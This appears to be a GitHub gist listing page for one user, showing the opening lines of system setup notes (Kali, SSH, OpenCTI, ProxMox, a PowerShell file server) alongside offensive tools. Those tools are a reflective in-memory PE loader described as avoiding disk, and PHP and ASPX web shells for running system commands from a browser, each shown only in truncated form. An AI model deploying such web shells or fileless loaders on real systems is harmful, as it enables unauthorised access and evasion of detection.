@timsonner
timsonner / kali-setup.md
Last active June 6, 2025 07:34
Remove firefox, libreoffice, and kali-desktop-xfce. Install Edge, VS Code, Git, Xfce, and Synaptics DisplayLink driver.

Kali setup

# Get rid of Kali xfce
apt remove kali-desktop-xfce --allow-remove-essential
apt purge kali-desktop-xfce --autoremove
# Install xfce
apt install xfce4 lightdm
# Get rid of firefox
apt remove firefox-esr --allow-remove-essential
@timsonner
timsonner / ssh-setup.md
Created May 18, 2025 18:22
Linux SSH server setup and key pair generation

Linux SSH server setup and key pair generation

SSH server setup

# Install SSH server
apt install openssh-server
# Enable SSH server on startup
systemctl enable ssh
# Check SSH server status
systemctl status ssh
@timsonner
timsonner / opencti-docker-setup.md
Created May 18, 2025 17:44
OpenCTI docker setup for MacOS

OpenCTI docker setup for MacOS

Clone OpenCTI repo

git clone https://github.com/OpenCTI-Platform/docker.git
cd docker

Create .env file for OpenCTI setup for MacOS (use official docs for windows/linux)

create-env.sh

@timsonner
timsonner / proxmox-setup.md
Last active April 27, 2025 20:37
ProxMox developer workstation config notes

ProxMox Developer Workstation setup

  • Install ProxMox as usual
  • Edit /etc/network/interfaces to reflect the correct IP and interface of ethernet adapter
  • Edit /etc/resolv.conf to reflect DNS server, likely gateway of router or switch

Once internet connection established, install gnome

apt install gnome
@timsonner
timsonner / triage-security-events.md
Created April 13, 2025 12:34
PowerShell. Look up Windows security events quickly to correlate activity.
@timsonner
timsonner / reflective-pe-load.ps1
Created March 12, 2025 02:29
Load an executable into memory without touching disk using PowerShell to reflectively load a C# type
# Reflectively load a PE file
$code = @"
using System;
using System.Runtime.InteropServices;
using System.IO;
public class PELoader
{
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr GetCurrentProcess();
@timsonner
timsonner / user-account-control-proeprties.md
Created February 22, 2025 05:59
UserAccountControl properties. Property, Hex, Decimal, Description.
| Property Flag | Value in Hexadecimal | Value in Decimal | Brief Description |
| --- | --- | --- | --- |
| SCRIPT | 0x0001 | 1 | The logon script will be run. |
| ACCOUNTDISABLE | 0x0002 | 2 | The user account is disabled. |
| HOMEDIR_REQUIRED | 0x0008 | 8 | The home folder is required. |
| LOCKOUT | 0x0010 | 16 | |
@timsonner
timsonner / php-shell-linux.md
Last active February 7, 2025 06:27
PHP, Javascript, HTML Non-Interactive web shell

PHP, Javascript, HTML non-interactive web shell

php-linux-shell.php

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Non-Interactive Shell</title>
    <script>
@timsonner
timsonner / powershell-http-fileserver.md
Last active February 1, 2025 23:00
Fileserver in PowerShell. Rough equivalent of python3 -m http.server...

PowerShell HTTP fileserver

Kick hole in firewall

New-NetFirewallRule -DisplayName "Open Port 8081" -Direction Inbound -Protocol TCP -LocalPort 8081 -Action Allow

PowerShell Http Server

# Define the directory to serve
@timsonner
timsonner / shell.aspx
Last active January 29, 2025 08:46
IIS PowerSnail Shell with pretty output. Spawn system processes from web browser...
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>PowerSnail Shell</title>
<style>
.output {
font-family: Consolas, "Courier New", monospace;